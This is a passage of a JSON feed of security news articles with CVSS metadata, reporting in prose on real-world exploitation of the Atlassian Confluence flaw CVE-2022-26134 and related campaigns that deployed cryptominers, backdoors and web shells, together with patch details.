Confluence Server that came to light a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations.\n\n\"If left unremedied and successfully exploited, this vulnerability could be used for multiple and more malicious attacks, such as a complete domain takeover of the infrastructure and the deployment information stealers, remote access trojans (RATs), and ransomware,\" Trend Micro threat researcher Sunil Bharti [said](<https://www.trendmicro.com/en_us/research/22/i/atlassian-confluence-vulnerability-cve-2022-26134-abused-for-cryptocurrency-mining-other-malware.html>) in a report.\n\nThe issue, tracked as [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) (CVSS score: 9.8), was addressed by the Australian software company in June 2022.\n\nIn one of the infection chains observed by the cybersecurity company, the flaw was leveraged to download and run a shell script (\"ro.sh\") on the victim's machine, which, in turn, fetched a second shell script (\"ap.sh\").\n\nThe malicious code is designed to update the [PATH variable](<https://www.digitalocean.com/community/tutorials/how-to-view-and-update-the-linux-path-environment-variable>) to include additional paths such as \"/tmp\", download the cURL utility (if not already present) from a remote server, disable iptables firewall, abuse the [PwnKit flaw](<https://thehackernews.com/2022/09/new-stealthy-shikitega-malware.html>) (CVE-2021-4034) to gain root privileges, and ultimately deploy the hezb crypto miner.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgJUBIiTQNhHQT7F4futeVMM2_cBIIPj-5ZrZyhn0F2LxqA0mpy-CsPoin32NArWubqXSZLDYTS1ZIeDtR_X8GEGlXvkNeXx4aL2VaogujG-5IWSExG-3DZArq7MNuOLv1yLywHo1bUv6GdjWbgkDMoArlCUKyC2Er-EgIo1UmgacIcGat8-xAz6eag/s728-e100/curl.jpg>)\n\nLike other cryptojacking attacks, the shell script also terminates other competing coin miners, disables cloud service provider agents from Alibaba and 
Tencent, before carrying out lateral movement via SSH.\n\nThe findings mirror similar exploitation attempts previously disclosed by [Lacework](<https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/>), [Microsoft, Sophos](<https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html>), and [Akamai](<https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations>) in June.\n\nLacework's analysis further shows that the command-and-control (C2) server used to retrieve the cURL software as well as the hezb miner also distributed a Golang-based ELF binary named \"[kik](<https://www.virustotal.com/gui/file/f13e48658426307d9d1434b50fa0493f566ed1f31d6e88bb4ac2ae12ec31ef1f/>)\" that enables the malware to kill processes of interest.\n\nUsers are advised to prioritize patching the flaw as it could be abused by threat actors for other nefarious purposes.\n\n\"Attackers could take advantage of injecting their own code for interpretation and gain access to the Confluence domain being targeted, as well as conduct attacks ranging from controlling the server for subsequent malicious activities to damaging the infrastructure itself,\" Bharti said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-22T06:17:00", "type": "thn", "title": "Hackers Targeting Unpatched Atlassian Confluence Servers to Deploy Crypto Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4034", "CVE-2022-26134"], "modified": "2022-09-22T06:17:56", "id": "THN:E0B486DA1C8CE77D0DF337E8307100D6", "href": "https://thehackernews.com/2022/09/hackers-targeting-unpatched-atlassian.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T15:21:14", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjZikEHbQZH2740G4dp8jO0kyRIM7gekb01xPNfj0-CNWOHWfP49M11r5XMILsEcE7cPt2iS2r5JguGaSn_eB79jXM2K0R34NTk8BJ914Rl12I6nIAEFE-yl5_wTmv9bEkhsALDug2BF38CByGj0bXfCDfOdw9gmkOjWBtZi0TtheQni8IQOx3M9hnZ/s728-e100/hacking.jpg>)\n\nA threat actor is said to have \"highly likely\" exploited a 
security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector.\n\nThe attack, which transpired over a seven-day-period during the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch as **TAC-040**.\n\n\"The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian's Confluence directory,\" the company [said](<https://www.deepwatch.com/labs/deepwatch-ati-detects-and-responds-to-never-before-discovered-backdoor-deployed-using-confluence-vulnerability-for-suspected-espionage/>). \"After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment.\"\n\nThe Atlassian vulnerability suspected to have been exploited is [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>), an Object-Graph Navigation Language (OGNL) injection flaw that paves the way for arbitrary code execution on a Confluence Server or Data Center instance.\n\nFollowing reports of active exploitation in real-world attacks, the issue was addressed by the Australian company on June 4, 2022.\n\nBut given the absence of forensic artifacts, Deepwatch theorized the breach could have alternatively entailed the exploitation of the Spring4Shell vulnerability ([CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>)) to gain initial access to the Confluence web application.\n\nNot much is known about TAC-040 other than the fact that the adversarial collective's goals could be espionage-related, although the possibility that the group could have acted out of financial gain hasn't been ruled out, citing the presence of a loader for an XMRig crypto miner on the system.\n\nWhile there is no evidence that the miner was executed in this incident, 
the Monero address owned by the threat actors has netted at least 652 XMR ($106,000) by hijacking the computing resources of other systems to illicitly mine cryptocurrency.\n\nThe attack chain is also notable for the deployment of a previously undocumented implant called Ljl Backdoor on the compromised server. Roughly 700MB of archived data is estimated to have been exfiltrated before the server was taken offline by the victim, according to an analysis of the network logs.\n\nThe malware, for its part, is a fully-featured trojan virus designed to gather files and user accounts, load arbitrary .NET payloads, and amass system information as well as the victim's geographic location. \n\n\"The victim denied the threat actor the ability to laterally move within the environment by taking the server offline, potentially preventing the exfiltration of additional sensitive data and restricting the threat actor(s) ability to conduct further malicious activities,\" the researchers said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T10:24:00", "type": "thn", "title": "Hackers Exploited Atlassian Confluence Bug to Deploy Ljl Backdoor for Espionage", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-26134"], "modified": "2022-08-05T14:21:49", "id": "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "href": "https://thehackernews.com/2022/08/hackers-exploited-atlassian-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-16T15:26:53", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh1sRBo_ZY7HgvKOAmX48Fm2WVmdgzaxlpLKjWJdIbcDmSPoMhKNRnvoEzs1CeLQfriVUkngqRhLj6-9awHtv_DcqbKgRbmXo_M_03xicrkKz34GxB6Z68bL51GfJszPQZSm7wdORW1UR-5UcTEgmW2YZ3RvbgUdobA9TKfRbeoXpG1vtvq1S-yeEcf/s728-e100/crypto-mining.jpg>)\n\nMalicious actors such as Kinsing are taking advantage of 
both recently disclosed and older security flaws in Oracle WebLogic Server to deliver cryptocurrency-mining malware.\n\nCybersecurity company Trend Micro said it [found](<https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html>) the financially-motivated group leveraging the vulnerability to drop Python scripts with capabilities to disable operating system (OS) security features such as Security-Enhanced Linux ([SELinux](<https://www.redhat.com/en/topics/linux/what-is-selinux>)), and others.\n\nThe operators behind the [Kinsing malware](<https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces>) have a history of scanning for vulnerable servers to co-opt them into a botnet, including that of [Redis](<https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html>), [SaltStack](<https://redcanary.com/blog/kinsing-malware-citrix-saltstack/>), [Log4Shell](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>), [Spring4Shell](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>), and the Atlassian Confluence flaw ([CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html>)).\n\nThe Kinsing actors have also been involved in campaigns against container environments via [misconfigured open Docker Daemon API ports](<https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability>) to launch a crypto miner and subsequently spread the malware to other containers and hosts.\n\nThe latest wave of attacks entails the actor weaponizing [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (CVSS score: 9.8), a two-year-old remote code execution (RCE) bug, against unpatched servers to seize control of the server and drop malicious payloads.\n\nIt's worth noting that the vulnerability has been [exploited in the 
past](<https://thehackernews.com/2020/12/multiple-botnets-exploiting-critical.html>) by multiple botnets to distribute Monero miners and the Tsunami backdoor on infected Linux systems. \n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh-utvgKxe36MyxmW2adubFVWxVKr-1Z4nJnB9nCLoIz72PJGF2D8Ti92uYdI0q1Y-KNK6paKazaUlHWRQZziPwY5119ANOJMXqaoGe4zOQOvqeEL1KkDD0Ed6TPx0FMjstH-f-8Sk0X--OysqaQnanHwm4INx3STYgUBwVWAo4Jzx5tnTWbKUt7EO4/s728-e100/hack.jpg>)\n\nSuccessful exploitation of the flaw was succeeded by the deployment of a shell script that's responsible for a series of actions: Removing the [/var/log/syslog](<https://help.ubuntu.com/community/LinuxLogFiles>) system log, turning off security features and cloud service agents from Alibaba and Tencent, and killing competing miner processes.\n\nThe shell script then proceeds to download the Kinsing malware from a remote server, while also taking steps to ensure persistence by means of cron job.\n\n\"The successful exploitation of this vulnerability can lead to RCE, which can allow attackers to perform a plethora of malicious activities on affected systems,\" Trend Micro said. \"This can range from malware execution [...] 
to theft of critical data, and even complete control of a compromised machine.\"\n\n## **TeamTNT actors make a comeback with new attacks**\n\nThe development comes as researchers from Aqua Security identified three new attacks linked to another \"vibrant\" cryptojacking group called TeamTNT, which voluntarily shut shop in November 2021.\n\n\"TeamTNT has been scanning for a misconfigured Docker Daemon and deploying alpine, a vanilla container image, with a command line to download a shell script (k.sh) to a C2 server,\" Aqua Security researcher Assaf Morag [said](<https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt>).\n\nWhat's notable about the attack chain is that it appears to be designed to break [SECP256K1 encryption](<https://en.bitcoin.it/wiki/Secp256k1>), which, if successful, could give the actor the ability to calculate the keys to any cryptocurrency wallet. Put differently, the idea is to leverage the high but illegal computational power of its targets to run the ECDLP solver and get the key.\n\nTwo other attacks mounted by the group entail the exploitation of [exposed Redis servers](<https://blog.aquasec.com/container-attacks-on-redis-servers>) and misconfigured Docker APIs to deploy coin miners and Tsunami binaries.\n\nTeamTNT's targeting of Docker REST APIs has been [well-documented](<https://thehackernews.com/2021/12/ongoing-autom-cryptomining-malware.html>) over the past year. 
But in an [operational security blunder](<https://www.trendmicro.com/en_us/research/22/i/security-breaks-teamtnts-dockerhub-credentials-leak.html>) spotted by Trend Micro, credentials associated with two of the attacker-controlled DockerHub accounts have been uncovered.\n\nThe accounts \u2013 alpineos and sandeep078 \u2013 are said to have been used to distribute a variety of malicious payloads like rootkits, Kubernetes exploit kits, credential stealers, XMRig Monero miners, and even the Kinsing malware.\n\n\"The account alpineos was used in exploitation attempts on our honeypots three times, from mid-September to early October 2021, and we tracked the deployments' IP addresses to their location in Germany,\" Trend Micro's Nitesh Surana [said](<https://www.trendmicro.com/en_us/research/22/i/security-breaks-teamtnts-dockerhub-credentials-leak.html>).\n\n\"The threat actors were logged in to their accounts on the DockerHub registry and probably forgot to log out.\" Alternatively, \"the threat actors logged in to their DockerHub account using the credentials of alpineos.\"\n\nTrend Micro said the malicious alpineos image had been downloaded more than 150,000 times, adding it notified Docker about these accounts. \n\nIt's also recommending organizations to configure the exposed REST API with TLS to mitigate adversary-in-the-middle (AiTM) attacks, as well as use credential stores and [helpers](<https://github.com/docker/docker-credential-helpers>) to host user credentials.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-16T10:58:00", "type": "thn", "title": "Hackers Targeting WebLogic Servers and Docker APIs for Mining Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2022-26134"], "modified": "2022-09-16T15:00:46", "id": "THN:FF1CD6F91A87ADD45550F34DE9C8204A", "href": "https://thehackernews.com/2022/09/hackers-targeting-weblogic-servers-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-01T09:57:46", "description": "A cloud threat actor group tracked as 8220 has updated its 
malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign.\n\n\"The updates include the deployment of new versions of a crypto miner and an IRC bot,\" Microsoft Security Intelligence [said](<https://twitter.com/MsftSecIntel/status/1542281805549764608>) in a series of tweets on Thursday. \"The group has actively updated its techniques and payloads over the last year.\"\n\n8220, active since [early 2017](<https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html>), is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control (C2) servers over port 8220. It's also the developer of a tool called whatMiner, which has been co-opted by the [Rocke](<https://thehackernews.com/2021/02/new-cryptojacking-malware-targeting.html>) cybercrime group in their attacks.\n\nIn July 2019, the Alibaba Cloud Security Team [uncovered](<https://www.alibabacloud.com/blog/8220-mining-group-now-uses-rootkit-to-hide-its-miners_595055>) an extra shift in the adversary's tactics, noting its use of rootkits to hide the mining program. 
Two years later, the gang [resurfaced](<https://www.lacework.com/blog/8220-gangs-recent-use-of-custom-miner-and-botnet/>) with Tsunami [IRC botnet](<https://en.wikipedia.org/wiki/IRC_bot>) variants and a custom \"PwnRig\" miner.\n\nNow, according to Microsoft, the most recent campaign striking i686 and x86_64 Linux systems has been observed weaponizing remote code execution exploits for the freshly disclosed Atlassian Confluence Server ([CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html>)) and Oracle WebLogic ([CVE-2019-2725](<https://thehackernews.com/2019/05/ransomware-oracle-weblogic.html>)) for initial access.\n\nThis step is followed by the retrieval of a malware loader from a remote server that's designed to drop the PwnRig miner and an IRC bot, but not before taking steps to evade detection by erasing log files and disabling cloud monitoring and security software.\n\nBesides achieving persistence by means of a cron job, the \"loader uses the IP port scanner tool 'masscan' to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool 'spirit' to propagate,\" Microsoft said.\n\nThe findings come as Akamai [revealed](<https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations>) that the Atlassian Confluence flaw is witnessing a steady 20,000 exploitation attempts per day that are launched from about 6,000 IPs, down from a peak of 100,000 in the immediate aftermath of the bug disclosure on June 2, 2022. 67% of the attacks are said to have originated from the U.S.\n\n\"In the lead, commerce accounts for 38% of the attack activity, followed by high tech and financial services, respectively,\" Akamai's Chen Doytshman said this week. 
\"These top three verticals make up more than 75% of the activity.\"\n\nThe attacks range from vulnerability probes to determine if the target system is susceptible to injection of malware such as web shells and crypto miners, the cloud security company noted.\n\n\"What is particularly concerning is how much of a shift upward this attack type has garnered over the last several weeks,\" Doytshman added. \"As we have seen with similar vulnerabilities, this CVE-2022-26134 will likely continue to be exploited for at least the next couple of years.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-01T05:36:00", "type": "thn", "title": "Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2022-26134"], "modified": "2022-07-01T08:20:23", 
"id": "THN:F0450E1253FFE5CA527F039D3B3A72BD", "href": "https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-04T09:56:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjB-3FGATEcQvVgoHD4SeHSMPhxak-CS-oPPNSfU5-5SkLrm94tD5D0FIxx_OoOOtXyQiGBrKcDgRUW2iNO9g17pvv2yWaxWqF27SPffdburUe_xKI1xM67MdF81s7ep1qHWagF0rFoXsRGa15bMeP_43LBSreE8ELfJybJIroA1mHu5NL3se511yT6/s728-e100/jira.jpg>)\n\nAtlassian on Friday rolled out fixes to address a [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve remote code execution.\n\nTracked as [**CVE-2022-26134**](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>), the issue is similar to [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) \u2014 another security flaw the Australian software company patched in August 2021.\n\nBoth relate to a case of Object-Graph Navigation Language ([OGNL](<https://en.wikipedia.org/wiki/OGNL>)) injection that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\nThe newly discovered shortcoming impacts all supported versions of Confluence Server and Data Center, with every version after 1.3.0 also affected. 
It's been resolved in the following versions -\n\n * 7.4.17\n * 7.13.7\n * 7.14.3\n * 7.15.2\n * 7.16.4\n * 7.17.4\n * 7.18.1\n\nAccording to stats from internet asset discovery platform [Censys](<https://censys.io/cve-2022-26134-confluenza-omicron-edition/>), there are about 9,325 services across 8,347 distinct hosts running a vulnerable version of Atlassian Confluence, with [most instances](<https://datastudio.google.com/reporting/1fbdf17c-ae37-4501-bd3f-935b72d1f181/page/2DSuC>) located in the U.S., China, Germany, Russia, and France.\n\nEvidence of active exploitation of the flaw, likely by attackers of Chinese origin, came to light after cybersecurity firm Volexity discovered the flaw over the Memorial Day weekend in the U.S. during an incident response investigation.\n\n\"The targeted industries/verticals are quite widespread,\" Steven Adair, founder and president of Volexity, [said](<https://twitter.com/stevenadair/status/1532768026818490371>) in a series of tweets. \"This is a free-for-all where the exploitation seems coordinated.\"\n\n\"It is clear that multiple threat groups and individual actors have the exploit and have been using it in different ways. Some are quite sloppy and others are a bit more stealth.\"\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), besides [adding](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>) the zero-day bug to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), has also urged federal agencies to immediately block all internet traffic to and from the affected products and either apply the patches or remove the instances by June 6, 2022, 5 p.m. ET.
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T08:57:00", "type": "thn", "title": "Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-04T08:57:38", "id": "THN:362401076AC227D49D729838DBDC2052", "href": "https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-18T03:57:04", "description": "A sophisticated Chinese advanced persistent threat (APT) actor 
exploited a critical security vulnerability in Sophos' firewall product that came to light earlier this year to infiltrate an unnamed South Asian target as part of a highly targeted attack.\n\n\"The attacker implement[ed] an interesting web shell backdoor, create[d] a secondary form of persistence, and ultimately launch[ed] attacks against the customer's staff,\" Volexity [said](<https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/>) in a report. \"These attacks aimed to further breach cloud-hosted web servers hosting the organization's public-facing websites.\"\n\nThe zero-day flaw in question is tracked as [CVE-2022-1040](<https://thehackernews.com/2022/03/critical-sophos-firewall-rce.html>) (CVSS score: 9.8), and concerns an authentication bypass vulnerability that can be weaponized to execute arbitrary code remotely. It affects Sophos Firewall versions 18.5 MR3 (18.5.3) and earlier.\n\nSophos, which issued a patch for the flaw on March 25, 2022, noted that it was abused to \"target a small set of specific organizations primarily in the South Asia region\" and that it had notified the affected entities directly.\n\nNow, according to Volexity, early evidence of exploitation of the flaw commenced on March 5, 2022, when it detected anomalous network activity originating from an unnamed customer's Sophos Firewall running the then up-to-date version, nearly three weeks before public disclosure of the vulnerability.\n\n\"The attacker was using access to the firewall to conduct man-in-the-middle (MitM) attacks,\" the researchers said. 
\"The attacker used data collected from these MitM attacks to compromise additional systems outside of the network where the firewall resided.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjfKjGMxU9f1By4kZoaueFeICYJthIRyuvPWTxc8s0q2C7jWNX1Gnw6l06cNevtbWwc-WlR-RqbNxeIsdNPX2peEnO-wx8UlXLZt_DXhDA1SO-PFFO9ZBTJgHRcFERamkXbe2rC2UmykVCY8sMi4uQAmKGhBFdo0cmodi9751cbQW1T4L9-2SdlpXhr/s728-e100/cyber.jpg>)\n\nThe infection sequence post the firewall breach further entailed backdooring a legitimate component of the security software with the [Behinder](<https://github.com/Freakboy/Behinder>) web shell that could be remotely accessed from any URL of the threat actor's choosing.\n\nIt's noteworthy that the Behinder web shell was also leveraged earlier this month by Chinese APT groups in a separate set of intrusions exploiting a zero-day flaw in Atlassian Confluence Server systems ([CVE-2022-26134](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>)).\n\nAdditionally, the attacker is said to have created VPN user accounts to facilitate remote access, before moving on to modify DNS responses for specially targeted websites \u2014 primarily the victim's content management system (CMS) \u2014 with the goal of intercepting user credentials and session cookies.\n\nThe access to session cookies subsequently equipped the malicious party to take control of the WordPress site and install a second web shell dubbed [IceScorpion](<https://zhuanlan.zhihu.com/p/354906657>), with the attacker using it to deploy three open-source implants on the web server, including [PupyRAT](<https://github.com/n1nj4sec/pupy>), [Pantegana](<https://github.com/cassanof/pantegana>), and [Sliver](<https://github.com/BishopFox/sliver>).\n\n\"DriftingCloud is an effective, well equipped, and persistent threat actor targeting [five-poisons](<https://en.wikipedia.org/wiki/Five_Poisons>)-related targets. 
They are able to develop or purchase zero-day exploits to achieve their goals, tipping the scales in their favor when it comes to gaining entry to target networks.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-17T09:39:00", "type": "thn", "title": "Chinese Hackers Exploited Sophos Firewall Zero-Day Flaw to Target South Asian Entity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1040", "CVE-2022-26134"], "modified": "2022-06-18T03:43:31", "id": "THN:1E1F3CC9BEE728A9F18B223FC131E9B1", "href": "https://thehackernews.com/2022/06/chinese-hackers-exploited-sophos.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-27T05:57:36", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEim4NFlgiedsZyM9nwoYZyVFg6NDuuooSW_q7ZeHdDb9c-nm4-fV2cZ6gwe2Qw3aeBydho972W0dJXA-6XkWQU2Zj04xgVPiu3gJoJh70MQgBnT_aY_qN1k1go36E2XRD6oe1BuRQFLz8N9817kpoUXk2pdVCpIEqyo820bqOR6_HxWEZUByMqpZhQl/s728-e100/hacking.jpg>)\n\nA suspected ransomware intrusion attempt against an unnamed target leveraged a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment.\n\nThe [findings](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) come from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP device sitting on the network perimeter, while also identifying a previously unknown exploit as well as a couple of anti-forensic measures adopted by the actor on the device to erase traces of their actions.\n\nThe zero-day exploit in question is tracked as [CVE-2022-29499](<https://nvd.nist.gov/vuln/detail/CVE-2022-29499>) and was fixed by Mitel in April 2022 by means of a 